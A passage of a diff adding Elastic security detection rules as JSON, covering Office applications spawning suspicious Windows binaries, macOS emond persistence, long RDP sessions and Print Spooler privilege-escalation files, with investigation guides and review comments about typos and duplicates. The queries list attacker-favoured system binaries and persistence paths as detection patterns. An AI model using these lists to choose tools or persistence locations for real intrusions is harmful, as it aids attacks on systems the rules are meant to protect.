This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\n \"eqnedt32.exe\", \"excel.exe\", \"fltldr.exe\", \"msaccess.exe\",\n \"mspub.exe\", \"powerpnt.exe\", \"winword.exe\", \"outlook.exe\"\n ) and\n process.name : (\n \"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\",\n \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\", \"iexpress.exe\",\n \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\", \"net1.exe\", \"netsh.exe\",\n \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\", \"pwsh.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\", \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\",\n \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\",\n \"xwizard.exe\", \"explorer.exe\", \"rundll32.exe\", \"hh.exe\", \"msdt.exe\"\n ) and\n not (\n process.parent.name : \"outlook.exe\" and\n process.name : \"rundll32.exe\" and\n process.args : 
\"shell32.dll,Control_RunDLL\" and\n process.args : \"srchadmin.dll\"\n )\n", + "references": [ + "https://www.elastic.co/blog/vulnerability-summary-follina" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a624863f-a70d-417f-a7d2-7a404638d47f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + 
"reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "a624863f-a70d-417f-a7d2-7a404638d47f_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_107.json b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_107.json new file mode 100644 index 00000000000..4399f166d26 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_107.json 
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of the Event Monitor Daemon (emond) rules. Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Emond Rules Creation or Modification", + "query": "file where host.os.type == \"macos\" and event.type != \"deletion\" and\n file.path : (\"/private/etc/emond.d/rules/*.plist\", \"/etc/emon.d/rules/*.plist\", \"/private/var/db/emondClients/*\")\n", + "references": [ + "https://www.xorrior.com/emond-persistence/", + "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.014", + "name": "Emond", + "reference": "https://attack.mitre.org/techniques/T1546/014/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "a6bf4dd4-743e-4da8-8c03-3ebd753a6c90_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_3.json b/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_3.json new file mode 100644 index 00000000000..cea5593b47e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a74c60cb-70ee-4629-a127-608ead14ebf1_3.json 
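Review bot: The second path pattern in `query`, `"/etc/emon.d/rules/*.plist"`, looks like a typo: emond's rules directory is `emond.d`, and on macOS `/etc` resolves to `/private/etc`, so this pattern as written would never match a real rule file while the first pattern already covers the resolved path. Suggest `"/etc/emond.d/rules/*.plist"` so the rule still fires when the event reports the un-resolved `/etc` prefix. The rule also has no `note` (investigation guide) unlike the other rules in this commit, which would be worth adding given that legitimate administrative tooling can write to these directories.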
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected unusually high mean of RDP session duration. Long RDP sessions can be used to evade detection mechanisms via session persistence, and might be used to perform tasks such as lateral movement, that might require uninterrupted access to a compromised machine.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_mean_rdp_session_duration", + "name": "High Mean of RDP Session Duration", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "a74c60cb-70ee-4629-a127-608ead14ebf1", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". 
Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "a74c60cb-70ee-4629-a127-608ead14ebf1_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_110.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_110.json new file mode 100644 index 00000000000..9c13032025c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_110.json 
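Review bot: The tags array carries both `"Rule Type: ML"` and `"Rule Type: Machine Learning"`, which label the same property twice; unless the older tag is kept deliberately so saved queries filtering on it keep working, one of the two should be dropped. The rest of the document reads consistently, with the job id, anomaly_threshold and the `ml-rdp-lmd` index named in the setup text matching the lmd integration it references, though I cannot check the job id against the lmd package from here.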
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service including CVE-2020-1048 and CVE-2020-1337.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler SPL File Created", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\",\n \"System\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\rundll32.exe\")\n", + "references": [ + "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_111.json b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_111.json new file mode 100644 index 00000000000..62e04a67766 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7ccae7b-9d2c-44b2-a061-98e5946971fa_111.json 
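Review bot: The process.executable exclusion list in the query contains `"?:\\Windows\\System32\\mmc.exe"` twice, once at the head of the list and again after the svchost.exe entry; the second entry is dead and should be removed, in the _111 file in the next hunk as well, which carries the same query. The investigation guide also has a copy-paste remnant: the step `searching for login events (for example, 4624) to the target host after the registry modification` should read `after the SPL file creation`, since this rule is a file event rule and involves no registry activity. Separately, the `"\\Device\\Mup\\*.exe"` entry excludes every executable launched from a network share, which is a broad carve-out for a privilege-escalation rule; if it is a known false-positive source, a sentence in the false positive section explaining it would help analysts tuning the rule.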
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service including CVE-2020-1048 and CVE-2020-1337.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler SPL File Created", + "note": "## Triage and analysis\n\n### Investigating Suspicious Print Spooler SPL File Created\n\nPrint Spooler is a Windows service enabled by default in all Windows clients and servers. The service manages print jobs by loading printer drivers, receiving files to be printed, queuing them, scheduling, etc.\n\nThe Print Spooler service has some known vulnerabilities that attackers can abuse to escalate privileges to SYSTEM, like CVE-2020-1048 and CVE-2020-1337. This rule looks for unusual processes writing SPL files to the location `?:\\Windows\\System32\\spool\\PRINTERS\\`, which is an essential step in exploiting these vulnerabilities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that the machine has the latest security updates and is not running legacy Windows versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\",\n \"System\") and\n not user.id : \"S-1-5-18\" and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"\\\\Device\\\\Mup\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\printui.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\PROGRA~1\\\\*.exe\",\n \"?:\\\\PROGRA~2\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\rundll32.exe\")\n", + "references": [ + "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_109.json b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_109.json new file mode 100644 index 00000000000..ca4258025a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a7e7bfa3-088e-4f13-b29e-3986e0e756b8_109.json 
